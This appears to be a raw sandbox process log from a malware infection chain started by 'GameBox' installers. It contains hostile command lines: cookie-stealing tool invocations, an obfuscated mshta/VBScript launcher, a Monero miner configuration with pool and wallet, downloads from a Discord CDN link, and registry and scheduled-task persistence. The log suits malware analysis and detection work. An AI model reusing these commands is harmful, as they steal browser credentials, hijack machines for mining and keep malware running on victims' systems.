C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5080 -ip 5080
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1104 -s 2360
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-UVG66.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UVG66.tmp\MediaBurner2.tmp" /SL5="$1054C,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-84UOG.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-84UOG.tmp\VPN.tmp" /SL5="$1054E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-EITQ1.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EITQ1.tmp\WEATHER Manager.tmp" /SL5="$104FA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 280
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\B25D.exe
C:\Users\Admin\AppData\Local\Temp\B25D.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1504 -ip 1504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 2464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5456 -ip 5456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5360 -ip 5360
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 292
C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 292
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\1163862.exe
"C:\Users\Admin\AppData\Roaming\1163862.exe"
C:\Users\Admin\Documents\u9pzYiYnNByA7uyFsDrbpZcm.exe
"C:\Users\Admin\Documents\u9pzYiYnNByA7uyFsDrbpZcm.exe"
C:\Users\Admin\Documents\kNQQghA2b3_W8RSpEJCcChiB.exe
"C:\Users\Admin\Documents\kNQQghA2b3_W8RSpEJCcChiB.exe"
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Users\Admin\Documents\t4Bibx0tsFI28lCf0xjwp2NJ.exe
"C:\Users\Admin\Documents\t4Bibx0tsFI28lCf0xjwp2NJ.exe"
C:\Users\Admin\Documents\PKFhIMCZ9GGRnPOxrRcJeYLY.exe
"C:\Users\Admin\Documents\PKFhIMCZ9GGRnPOxrRcJeYLY.exe"
C:\Users\Admin\Documents\3Kdfkj8UDAPgDKWVyo_q162q.exe
"C:\Users\Admin\Documents\3Kdfkj8UDAPgDKWVyo_q162q.exe"
C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe
"C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe"
C:\Users\Admin\Documents\ViPPIwqv5bR0VGFmRSnZKqzN.exe
"C:\Users\Admin\Documents\ViPPIwqv5bR0VGFmRSnZKqzN.exe"
C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe
"C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe"
C:\Users\Admin\Documents\ILPujEdd9AGKq8RnK1t7kXBH.exe
"C:\Users\Admin\Documents\ILPujEdd9AGKq8RnK1t7kXBH.exe"
C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe
"C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe"
C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe
"C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe"
C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe
"C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe"
C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe
"C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe"
C:\Users\Admin\Documents\pzDHieIzjbxQQjMZ7ZFhFq7V.exe
"C:\Users\Admin\Documents\pzDHieIzjbxQQjMZ7ZFhFq7V.exe"
C:\Users\Admin\Documents\JZ4tbm9sZUxokPICPPwvXT5a.exe
"C:\Users\Admin\Documents\JZ4tbm9sZUxokPICPPwvXT5a.exe"
C:\Users\Admin\Documents\jmrqfuQetT5ED7vcJtdy9yMs.exe
"C:\Users\Admin\Documents\jmrqfuQetT5ED7vcJtdy9yMs.exe"
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Users\Admin\Documents\IDtuV35ejCiXUBTegysCPyO1.exe
"C:\Users\Admin\Documents\IDtuV35ejCiXUBTegysCPyO1.exe"
C:\Users\Admin\Documents\5zeJwRz7QimEmqn0U8Bnk2U8.exe
"C:\Users\Admin\Documents\5zeJwRz7QimEmqn0U8Bnk2U8.exe"
C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe
"C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe"
C:\Users\Admin\AppData\Roaming\6024070.exe
"C:\Users\Admin\AppData\Roaming\6024070.exe"
C:\Users\Admin\AppData\Roaming\4244192.exe
"C:\Users\Admin\AppData\Roaming\4244192.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe
"C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\FEA6.bat C:\Users\Admin\Documents\3Kdfkj8UDAPgDKWVyo_q162q.exe"
C:\Users\Admin\Documents\EVdlu6Z3VCvMuTveC1gU8W1X.exe
"C:\Users\Admin\Documents\EVdlu6Z3VCvMuTveC1gU8W1X.exe"
C:\Users\Admin\AppData\Roaming\5030033.exe
"C:\Users\Admin\AppData\Roaming\5030033.exe"
C:\Users\Admin\AppData\Local\Temp\FFA3.exe
C:\Users\Admin\AppData\Local\Temp\FFA3.exe
C:\Users\Admin\AppData\Roaming\3494345.exe
"C:\Users\Admin\AppData\Roaming\3494345.exe"
C:\Users\Admin\AppData\Local\Temp\is-8PGGC.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-8PGGC.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Users\Admin\AppData\Local\Temp\is-Q4D1Q.tmp\EVdlu6Z3VCvMuTveC1gU8W1X.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q4D1Q.tmp\EVdlu6Z3VCvMuTveC1gU8W1X.tmp" /SL5="$20368,138429,56832,C:\Users\Admin\Documents\EVdlu6Z3VCvMuTveC1gU8W1X.exe"
C:\Users\Admin\AppData\Local\Temp\tmpCD82_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpCD82_tmp.exe"
C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe
"C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2856 -ip 2856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7204 -ip 7204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 276
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6592 -ip 6592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 280
C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe
"C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe
"C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe" -q
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 316
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2204 -ip 2204
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe
C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7628 -ip 7628
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 6240 -ip 6240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 588
C:\Users\Admin\AppData\Local\Temp\is-GMVR4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GMVR4.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 876
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7196 -ip 7196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6764 -ip 6764
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\is-DC6PO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DC6PO.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 280
C:\Users\Admin\AppData\Roaming\7265684.exe
"C:\Users\Admin\AppData\Roaming\7265684.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4304 -ip 4304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7196 -s 460
C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp" /SL5="$3061E,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-DC6PO.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\6707195.exe
"C:\Users\Admin\AppData\Roaming\6707195.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "jZGfREbYpGe8op_zj1MF9p7K.exe" -f
C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp" /SL5="$2071E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-GMVR4.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Roaming\5249501.exe
"C:\Users\Admin\AppData\Roaming\5249501.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Users\Admin\Documents\3n__NyDwZWJFxhviTuq327Cf.exe
"C:\Users\Admin\Documents\3n__NyDwZWJFxhviTuq327Cf.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\8329830.exe
"C:\Users\Admin\AppData\Roaming\8329830.exe"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5156 -ip 5156
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BA0B7A51998FEE08DA32A3036127A0B5 C
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 280
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6312 -ip 6312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 276
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-PDGPV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PDGPV.tmp\Setup.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 380 -p 5144 -ip 5144
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\14322\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5144 -s 2444
C:\Users\Admin\AppData\Local\Temp\build\build.exe
"C:\Users\Admin\AppData\Local\Temp\build\build.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding ECC53CB7737134A087C5C387A941DED6
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\IDANZRKCEG\ultramediaburner.exe
"C:\Users\Admin\AppData\Local\Temp\IDANZRKCEG\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-BMVEP.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BMVEP.tmp\ultramediaburner.tmp" /SL5="$207CA,281924,62464,C:\Users\Admin\AppData\Local\Temp\IDANZRKCEG\ultramediaburner.exe" /VERYSILENT
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BE1356FCD8E9D8AB3EF9E1B0AE60B993 C
C:\Users\Admin\AppData\Local\Temp\b0-3d0d8-d76-d6ead-112ff92270293\Caemamylyxo.exe
"C:\Users\Admin\AppData\Local\Temp\b0-3d0d8-d76-d6ead-112ff92270293\Caemamylyxo.exe"
C:\Users\Admin\AppData\Local\Temp\76-1834a-5eb-f19aa-afce1c19b551c\ZHyzhekanifi.exe
"C:\Users\Admin\AppData\Local\Temp\76-1834a-5eb-f19aa-afce1c19b551c\ZHyzhekanifi.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 656 -p 7840 -ip 7840
C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7212 -ip 7212
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7840 -s 2412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2896 -ip 2896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 280
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6476 -ip 6476
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2416
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0bb846f8,0x7ffa0bb84708,0x7ffa0bb84718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
